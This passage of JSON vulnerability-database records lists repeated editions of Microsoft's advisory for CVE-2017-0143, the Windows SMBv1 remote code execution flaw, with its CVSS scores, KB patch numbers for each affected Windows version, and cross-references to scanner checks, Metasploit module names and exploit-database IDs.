"AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB3210721", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3212646", "KB4012217", "KB4012598", "KB3205401", "KB4012212", "KB3213986", "KB3205409", "KB4012215", "KB4012213", "KB4012214", "KBMS16-110, 3187754", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-30T20:47:04", "differentElements": ["msAffectedSoftware"], "edition": 83}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T06:44:56", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-30T06:48:04", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3212646", "KB3210721", "KB4013429", "KB4012214", "KB4012606", "KB4013198", "KB3205401", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3213986", "KB3210720", "KB4012598", "KB4012212", "KB4012216", "KB4012217", "KB4012213", "KB3205409"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T06:44:56", "differentElements": ["msAffectedSoftware"], "edition": 84}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-01T09:06:55", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
